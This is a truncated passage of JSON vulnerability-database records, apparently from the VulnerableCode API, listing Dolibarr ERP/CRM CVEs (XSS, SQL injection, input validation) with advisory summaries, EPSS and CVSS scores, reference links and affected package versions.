server.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2019-11201","reference_id":"","reference_type":"","scores":[{"value":"0.00559","scoring_system":"epss","scoring_elements":"0.68541","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2019-11201"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/63c0ab93fb21f86c1b736061af9fa1eee90148fd","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/63c0ab93fb21f86c1b736061af9fa1eee90148fd"},{"reference_url":"https://github.com/Dolibarr/dolibarr/issues/10984#issuecomment-485841141","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/issues/10984#issuecomment-485841141"},{"reference_url":"https://know.bishopfox.com/advisories/dolibarr-version-9-0-1-vulnerabilities","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://know.bishopfox.com/advisories/dolibarr-version-9-0-1-vulnerabilities"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2019-11201","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2019-11201"},{"reference_url":"https://github.com/advisories/GHSA-jwg3-v9xm-v6q9","reference_id":"GHSA-jwg3-v9xm-v6q9","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-jwg3-v9xm-v6q9"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/442949?format=json","purl":"pkg:composer/dolibarr/dolibarr@9.0.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-8xc8-p2ws-yqar"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-enqn-xkv2-nuf5"},{"vulnerability":"VCID-fd5f-b8q5-ayf5"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-j4d1-8q47-uqc4"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-ng17-k6q4-qfhe"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-s9rz-z4dd-rkhm"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"},{"vulnerability":"VCID-yrys-ch5x-23bv"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@9.0.2"},{"url":"http://public2.vulnerablecode.io/api/packages/106858?format=json","purl":"pkg:composer/dolibarr/dolibarr@9.0.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-8xc8-p2ws-yqar"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-enqn-xkv2-nuf5"},{"vulnerability":"VCID-fd5f-b8q5-ayf5"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-j4d1-8q47-uqc4"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-ng17-k6q4-qfhe"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-s9rz-z4dd-rkhm"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"},{"vulnerability":"VCID-yrys-ch5x-23bv"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@9.0.3"}],"aliases":["CVE-2019-11201","GHSA-jwg3-v9xm-v6q9"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-e6hj-wmum-tygv"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/55502?format=json","vulnerability_id":"VCID-enqn-xkv2-nuf5","summary":"Dolibarr ERP and CRM contain XSS Vulnerability\nDolibarr ERP/CRM before 10.0.3 has an Insufficient Filtering issue that can lead to user/card.php XSS.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2019-19211","reference_id":"","reference_type":"","scores":[{"value":"0.02101","scoring_system":"epss","scoring_elements":"0.84342","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2019-19211"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://herolab.usd.de/en/security-advisories/usd-2019-0053","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://herolab.usd.de/en/security-advisories/usd-2019-0053"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2019-19211","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2019-19211"},{"reference_url":"https://www.dolibarr.org/forum/dolibarr-changelogs","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.dolibarr.org/forum/dolibarr-changelogs"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/115188?format=json","purl":"pkg:composer/dolibarr/dolibarr@10.0.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-enqn-xkv2-nuf5"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-j4d1-8q47-uqc4"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-ng17-k6q4-qfhe"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-s9rz-z4dd-rkhm"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"},{"vulnerability":"VCID-y4h8-4zpp-qqfn"},{"vulnerability":"VCID-yrys-ch5x-23bv"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@10.0.3"},{"url":"http://public2.vulnerablecode.io/api/packages/443000?format=json","purl":"pkg:composer/dolibarr/dolibarr@10.0.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-j4d1-8q47-uqc4"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-ng17-k6q4-qfhe"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-s9rz-z4dd-rkhm"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@10.0.4"}],"aliases":["CVE-2019-19211","GHSA-gfhf-2xr5-2fvw"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-enqn-xkv2-nuf5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/14732?format=json","vulnerability_id":"VCID-exs6-buy9-zfcn","summary":"Dolibarr vulnerable to SQL Injection\nVulnerabilities in Dolibarr ERP - CRM that affect version 9.0.1 and allow SQL injection. These vulnerabilities could allow a remote attacker to send a specially crafted SQL query to the system and retrieve all the information stored in the database through the parameters sortorder y sortfield in /dolibarr/admin/dict.php.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-5314","reference_id":"","reference_type":"","scores":[{"value":"0.00106","scoring_system":"epss","scoring_elements":"0.28431","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-5314"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-5314","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-5314"},{"reference_url":"https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-dolibarrs-erp-cms","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2024-05-24T13:43:18Z/"}],"url":"https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-dolibarrs-erp-cms"},{"reference_url":"https://github.com/advisories/GHSA-c3h9-q3jx-w7fc","reference_id":"GHSA-c3h9-q3jx-w7fc","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-c3h9-q3jx-w7fc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/442949?format=json","purl":"pkg:composer/dolibarr/dolibarr@9.0.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-8xc8-p2ws-yqar"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-enqn-xkv2-nuf5"},{"vulnerability":"VCID-fd5f-b8q5-ayf5"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-j4d1-8q47-uqc4"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-ng17-k6q4-qfhe"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-s9rz-z4dd-rkhm"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"},{"vulnerability":"VCID-yrys-ch5x-23bv"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@9.0.2"}],"aliases":["CVE-2024-5314","GHSA-c3h9-q3jx-w7fc"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-exs6-buy9-zfcn"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/61200?format=json","vulnerability_id":"VCID-fd5f-b8q5-ayf5","summary":"Dolibarr ERP and CRM contain XSS Vulnerability\nDolibarr ERP/CRM before 10.0.3 allows XSS because uploaded HTML documents are served as text/html despite being renamed to .noexe files.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2019-19210","reference_id":"","reference_type":"","scores":[{"value":"0.00606","scoring_system":"epss","scoring_elements":"0.69981","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2019-19210"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://herolab.usd.de/security-advisories/usd-2019-0052","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://herolab.usd.de/security-advisories/usd-2019-0052"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2019-19210","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2019-19210"},{"reference_url":"https://www.dolibarr.org/forum/dolibarr-changelogs","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.dolibarr.org/forum/dolibarr-changelogs"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/115188?format=json","purl":"pkg:composer/dolibarr/dolibarr@10.0.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-enqn-xkv2-nuf5"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-j4d1-8q47-uqc4"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-ng17-k6q4-qfhe"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-s9rz-z4dd-rkhm"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"},{"vulnerability":"VCID-y4h8-4zpp-qqfn"},{"vulnerability":"VCID-yrys-ch5x-23bv"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@10.0.3"}],"aliases":["CVE-2019-19210","GHSA-87r3-4gc8-f897"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-fd5f-b8q5-ayf5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50726?format=json","vulnerability_id":"VCID-fvp2-wtsw-y7ee","summary":"Dolibarr vulnerable to Improper Validation of Specified Quantity in Input\nDolibarr 14.0.5 and prior versions are vulnerable to Improper Validation of Specified Quantity in Input.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0414","reference_id":"","reference_type":"","scores":[{"value":"0.00326","scoring_system":"epss","scoring_elements":"0.5582","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0414"},{"reference_url":"https://github.com/dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/dolibarr/dolibarr"},{"reference_url":"https://github.com/dolibarr/dolibarr/commit/37fb02ee760cfff18c795ba468da1ba1c53f4684","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/dolibarr/dolibarr/commit/37fb02ee760cfff18c795ba468da1ba1c53f4684"},{"reference_url":"https://huntr.dev/bounties/76f3b405-9f5d-44b1-8434-b52b56ee395f","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://huntr.dev/bounties/76f3b405-9f5d-44b1-8434-b52b56ee395f"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-0414","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-0414"},{"reference_url":"https://github.com/advisories/GHSA-f768-8pvq-mm6r","reference_id":"GHSA-f768-8pvq-mm6r","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-f768-8pvq-mm6r"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/36973?format=json","purl":"pkg:composer/dolibarr/dolibarr@15.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VC